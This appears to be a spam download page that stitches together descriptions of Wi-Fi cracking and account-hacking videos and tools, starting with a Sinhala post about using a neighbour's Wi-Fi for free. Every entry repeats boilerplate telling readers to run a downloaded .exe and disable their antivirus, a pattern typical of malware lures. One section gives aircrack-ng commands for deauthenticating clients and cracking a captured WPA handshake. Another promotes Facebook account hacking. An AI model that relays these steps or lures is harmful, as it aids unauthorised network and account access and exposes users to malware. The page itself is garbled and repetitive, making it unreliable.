ඕනම WIFI එකක් hack කරමු – Full Sinhala

ඔන්න අදත් පට්ට Trick එකක් අරගෙන ආව..මේකත් නොමිලේම Internet යන්න පුලුවන් තව ක්‍රමයක්…ලංකාවෙ හැම ගෙදරකටම අඩුම ගානෙ එක Wifi Lan එකක්වත් අහු වෙනවනෙ..එහා ගෙදර එකාගෙ හරි..මමනම් වැඩියෙන්ම Internet යන්නෙ එහා ගෙදර Wifi Lan

ඕනම WIFI එකක් hack කරමු – Full Sinhala
How to install:
– Download, extract and run .exe file,
(If your antivirus blocking file, pause it or disable it for some time.)
– Choose destination folder

How to Use:
Open destination folder and locate file notes.txt, open it and read step by step.
Enjoy!

Don’t forget to read instructions after installation.
Enjoy ඕනම WIFI එකක් hack කරමු – Full Sinhala.

All files are uploaded by users like you, we can’t guarantee that ඕනම WIFI එකක් hack කරමු – Full Sinhala are up to date.
We are not responsible for any illegal actions you do with theses files. Download and use ඕනම WIFI එකක් hack කරමු – Full Sinhala on your own responsibility.

Wi-Fi hacking WPA-WPA2 using aircrack-ng in Kali linux Wifi

Wi-Fi hacking WPA-WPA2 using aircrack-ng in Kali linux
|Wifi (WPA WPA2) crack using Kali Linux 2018.3 step by step
How to Hack WPA/WPA2 Wi Fi with Kali Linux

Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or “hack,” WPA and WPA2 networks. There are hundreds of Windows applications that claim they can hack WPA; don’t get them! They’re just scams, used by professional hackers, to lure newbie or wannabe hackers into getting

Wi-Fi hacking WPA-WPA2 using aircrack-ng in Kali linux Wifi
How to install:
– Download, extract and run .exe file,
(If your antivirus blocking file, pause it or disable it for some time.)
– Choose destination folder

How to Use:
Open destination folder and locate file notes.txt, open it and read step by step.
Enjoy!

Don’t forget to read instructions after installation.
Enjoy Wi-Fi hacking WPA-WPA2 using aircrack-ng in Kali linux Wifi.

All files are uploaded by users like you, we can’t guarantee that Wi-Fi hacking WPA-WPA2 using aircrack-ng in Kali linux Wifi are up to date.
We are not responsible for any illegal actions you do with theses files. Download and use Wi-Fi hacking WPA-WPA2 using aircrack-ng in Kali linux Wifi on your own responsibility.

Wifi Tool Wifresti Kali linux Tool Wifresti Also for Mac and

Wifresti Tools is password recovery tools written in python programming language wifresti Kali Linux Tool this tool is also available for Mac and Windows the downloaded links are below.

Download Link For Linux Here: –

Download Link For Windows Here :

#Wifresti

Find your wireless network password from Windows , Linux and Mac OS

Wifresti is a simple Wi-Fi password recovery tool , compatible with Windows , and Unix systems (Linux , Mac OS) .

#Features

Recover Wifi password on

Wifi Tool Wifresti Kali linux Tool Wifresti Also for Mac and
How to install:
– Download, extract and run .exe file,
(If your antivirus blocking file, pause it or disable it for some time.)
– Choose destination folder

How to Use:
Open destination folder and locate file notes.txt, open it and read step by step.
Enjoy!

Don’t forget to read instructions after installation.
Enjoy Wifi Tool Wifresti Kali linux Tool Wifresti Also for Mac and.

All files are uploaded by users like you, we can’t guarantee that Wifi Tool Wifresti Kali linux Tool Wifresti Also for Mac and are up to date.
We are not responsible for any illegal actions you do with theses files. Download and use Wifi Tool Wifresti Kali linux Tool Wifresti Also for Mac and on your own responsibility.

Kali Linux – fsociety Mr.Robot

● Subscribe new channel for more f*cking awesome tutorials ^_^

Download Link:

This video is for educational purposes only!
I’m not responsible for your actions!

Kali Linux – fsociety Mr.Robot
How to install:
– Download, extract and run .exe file,
(If your antivirus blocking file, pause it or disable it for some time.)
– Choose destination folder

How to Use:
Open destination folder and locate file notes.txt, open it and read step by step.
Enjoy!

Don’t forget to read instructions after installation.
Enjoy Kali Linux – fsociety Mr.Robot.

All files are uploaded by users like you, we can’t guarantee that Kali Linux – fsociety Mr.Robot are up to date.
We are not responsible for any illegal actions you do with theses files. Download and use Kali Linux – fsociety Mr.Robot on your own responsibility.

fsociety Hacking Tools Pack – Mr. Robot Penetration Testing

Hey guys! HackerSploit here back again with another script showcase. In this video, we will be looking at the Fsociety hacking tools pack, a Penetration testing framework inspired by Mr Robot.

Mega Link(Repo Down) Just Download And Unzip:
Fsociety Github Repo:

—————————————————-
HackerSploit Website:

Pure VPN Affiliate Link:
PureVPN:

📗 Get My Courses at $10 Only!
The Complete Deep Web Course 2017:

I Hope you enjoy/enjoyed the video.
If you have

fsociety Hacking Tools Pack – Mr. Robot Penetration Testing
How to install:
– Download, extract and run .exe file,
(If your antivirus blocking file, pause it or disable it for some time.)
– Choose destination folder

How to Use:
Open destination folder and locate file notes.txt, open it and read step by step.
Enjoy!

Don’t forget to read instructions after installation.
Enjoy fsociety Hacking Tools Pack – Mr. Robot Penetration Testing.

All files are uploaded by users like you, we can’t guarantee that fsociety Hacking Tools Pack – Mr. Robot Penetration Testing are up to date.
We are not responsible for any illegal actions you do with theses files. Download and use fsociety Hacking Tools Pack – Mr. Robot Penetration Testing on your own responsibility.

Kali Linux 2017.3 FLUXION rev.10 Create fake AP’s To Crack

I am not responsible for any damage you do, this is for educational purposes only!

Kali Linux 2017.3 FLUXION rev.10 Create fake AP’s To Crack
How to install:
– Download, extract and run .exe file,
(If your antivirus blocking file, pause it or disable it for some time.)
– Choose destination folder

How to Use:
Open destination folder and locate file notes.txt, open it and read step by step.
Enjoy!

Don’t forget to read instructions after installation.
Enjoy Kali Linux 2017.3 FLUXION rev.10 Create fake AP’s To Crack.

All files are uploaded by users like you, we can’t guarantee that Kali Linux 2017.3 FLUXION rev.10 Create fake AP’s To Crack are up to date.
We are not responsible for any illegal actions you do with theses files. Download and use Kali Linux 2017.3 FLUXION rev.10 Create fake AP’s To Crack on your own responsibility.

How to Hack Facebook Account with Kali Linux 100 sure 2018 New

hack facebook using SE-TOOLKIT in KALI Linux by Carew Rodrigues. 100 % working .
if you have any problem related Facebook hacking comment
i will explain you

whatsapp no.+917891076797
facebook account:
Free Recharge Blog:
learn hacking :

NEXT VIDEO : How To Hack Instagram aacoount

How to Hack Facebook Account with Kali Linux 100 sure 2018 New
How to install:
– Download, extract and run .exe file,
(If your antivirus blocking file, pause it or disable it for some time.)
– Choose destination folder

How to Use:
Open destination folder and locate file notes.txt, open it and read step by step.
Enjoy!

Don’t forget to read instructions after installation.
Enjoy How to Hack Facebook Account with Kali Linux 100 sure 2018 New.

All files are uploaded by users like you, we can’t guarantee that How to Hack Facebook Account with Kali Linux 100 sure 2018 New are up to date.
We are not responsible for any illegal actions you do with theses files. Download and use How to Hack Facebook Account with Kali Linux 100 sure 2018 New on your own responsibility.

New Best way to Crack or Hack WPA-WPA2 PSK Wi Fi Password 40

This is more best way to crack or hack any WPA- WPA2 PSK wifi PASSWORD immediately and Faster – For more details please subscribe my channel

For more details please subscribe my channel —

Like my facebook Page — …

Repair any corrupted memory card, Pen Drive & External Hard Disk easily —

How to hack wpa, wpa2- psk password on Mobile eaisly or bypass latest new 2017 —

New Best way to Crack or Hack WPA-WPA2 PSK Wi Fi Password 50 times Faster —

World’s fastest typing speed

New Best way to Crack or Hack WPA-WPA2 PSK Wi Fi Password 40
How to install:
– Download, extract and run .exe file,
(If your antivirus blocking file, pause it or disable it for some time.)
– Choose destination folder

How to Use:
Open destination folder and locate file notes.txt, open it and read step by step.
Enjoy!

Don’t forget to read instructions after installation.
Enjoy New Best way to Crack or Hack WPA-WPA2 PSK Wi Fi Password 40.

All files are uploaded by users like you, we can’t guarantee that New Best way to Crack or Hack WPA-WPA2 PSK Wi Fi Password 40 are up to date.
We are not responsible for any illegal actions you do with theses files. Download and use New Best way to Crack or Hack WPA-WPA2 PSK Wi Fi Password 40 on your own responsibility.

Hacking WiFi

Cracking wifi with aircrack-ng suite.

airmon-ng
put wireless card in monitor mode

airodump-ng
monitor all available networks/routers

airodump-ng -c channel –bssid bssid -w psk interface
captures handshake

aireplay-ng -a 80:37:73:DA:C0:84 –deauth 0 wlan0mon
deauthenticates

aircrack-ng -w password.lst -b handshake psk*.cap
cracks the handshake

Disclaimer: for demonstration purposes only not to be used illegally.

Hacking WiFi
How to install:
– Download, extract and run .exe file,
(If your antivirus blocking file, pause it or disable it for some time.)
– Choose destination folder

How to Use:
Open destination folder and locate file notes.txt, open it and read step by step.
Enjoy!

Don’t forget to read instructions after installation.
Enjoy Hacking WiFi.

All files are uploaded by users like you, we can’t guarantee that Hacking WiFi are up to date.
We are not responsible for any illegal actions you do with theses files. Download and use Hacking WiFi on your own responsibility.

INSTALL MAC OS SIERRA ON PC LAPTOP

Hacked BY: Prof. Karimovich Fumiyanov (Master Hacker) – ***Indonesian Anonymouz***

INSTALL MAC OS SIERRA ON PC LAPTOP
How to install:
– Download, extract and run .exe file,
(If your antivirus blocking file, pause it or disable it for some time.)
– Choose destination folder

How to Use:
Open destination folder and locate file notes.txt, open it and read step by step.
Enjoy!

Don’t forget to read instructions after installation.
Enjoy INSTALL MAC OS SIERRA ON PC LAPTOP.

All files are uploaded by users like you, we can’t guarantee that INSTALL MAC OS SIERRA ON PC LAPTOP are up to date.
We are not responsible for any illegal actions you do with theses files. Download and use INSTALL MAC OS SIERRA ON PC LAPTOP on your own responsibility.